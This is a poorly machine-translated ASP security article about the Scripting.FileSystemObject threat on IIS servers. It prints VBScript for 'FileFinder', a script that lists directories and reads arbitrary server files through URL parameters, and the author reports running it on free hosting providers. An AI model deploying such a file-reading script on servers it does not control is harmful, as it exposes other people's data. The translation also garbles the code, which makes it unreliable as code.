Threats and countermeasures of scripting.filesystemobject objects in ASP

zhaozj2021-02-08  242

Edward Yang (EDYANG75@sina.com)

Scripting.FileSystemObject object is one of the COM objects that are provided by Scrrun.dll for VBScript / JScript control. Scripting.FileSystemObject provides a very convenient text file and file directory access, but it also has a certain threat to IIS web server data security.

Before you continue to discuss, please go to the author's home page http://263.9cbs.net/edyang/ Download District Source column Download FileFinder ASP source code.

The FileFinder code is simple, consisting of three functions and 30 rows of order code.

The most critical is the FindFiles function, which implements traversal to a directory by calling it, and searches for these files in accordance with a specific file extension.

Function Findfiles (strStartFolder, strexT)

DIM N

Dim Othisfolder

Dim ofolders

DIM ofiles

DIM ofolder

DIM OXILE

'If the system administrator is detailed, the following code is wrong.

'But some directories can still be viewed, so we simply ignore the mistakes

ON Error ResMe next

N = 0

Response.write " Searching" & StrstartFolder & "

Set otherisfolder = g_fs.getfolder (strStartFolder)

Set ofiles = othisfolder.files

For Each ofile IN Ofiles

'If it is the specified file extension, the output connection is guided itself, but with different commands cmd

'Here is cmd = read, i.e. read the text file that specifies the physical path.

If Issuffix (ofile.path, strext) THEN

Response.write " "& Ofile.Path &" < / font>

IF err = 0 THEN

n = n 1

END IF

END IF

NEXT

Set ofolders = OtHisfolder.subfolders

For Each ofolder InfoLDERS

n = n findfiles (ofolder.path, strext)

NEXT

Findfiles = n

END FUNCTION

The following code is to analyze the parameters behind the URL:

'Readout the value of each parameter

Strcmd = ucase (Request.QueryString ("cmd"))

StrPath = Request.QueryString ("Path")

strext = request.QueryString ("EXT")

BrawData = ucase (Request.QueryString ("RAW")) 'Default Search .asp file

If strpath = "" "

StrPath = "."

END IF

If strext = "" ""

strext = ".asp"

END IF

'Perform different code based on different commands cmd

Select Case StrCmd

Case "find"

Response.write FindFiles (StrPath, Strext) & "File (s) FOUND"

Case "Read"

If BrawData = "T" THEN

Response.write readtextFile (STRPATH)

Else

Response.write "

" & Server.htmlencode (ReadTextFile (StrPath)) & ""

END IF

Case Else

Response.write "

please specify a command to execute "

End SELECT

As can be seen from the above analysis, if there is enough permissions, we can find any text files on the IIS web server via FileFinder, and can easily view the file content. For non-text files, they can determine if they exist and their paths, which are sometimes extremely important for advanced HACKERs.

But these prerequisites for these threats of data is to perform FF.ASP users have at least the permissions of the read directory and files. Since the default security settings after Windows NT Server are installed, all users can "read" directory and files, so whether it is the default user IUSR_SERVERNAME IUSR_SERVERNAME or any other user, it can read the directory and files. Information. Most of the Windows NT Server system administrators mainly care about whether the system can run, generally unwilling to change the default directory and file permissions, after all, do a big risk, and need many experience. So, we can use FileFinder to check if the security settings of the NT Server of the Web Server are safe.

The author is specifically set up for the permissions of the file system of the IIS web server, but is limited to no experience, resulting in many strange mistakes, such as: NT Server 4.0 used to do experiments cannot be connected to the Access database. These functions are normal before performing file system permission changes.

In the purpose of pure research, the author is also experimenting with the free ASP space I applied (including my personal homepage provided by 9CBS), and the result is that FileFinder can run smoothly. And at http://www2.domaindlx.com/index.html, there is no such problem, and this free ASP homepage provider can be seen in this regard or serious. Although the Domaindlx's web server runs on Windows 2000 Server, its default file system security permissions and NT 4.0 have no big difference.

Due to the limited capacity of the author, discuss this issue here. References are only available to the domestic ASP homepage providers in this article, hoping to help the data security between providers and customers.

转载请注明原文地址:https://www.9cbs.com/read-2701.html

New Post(0)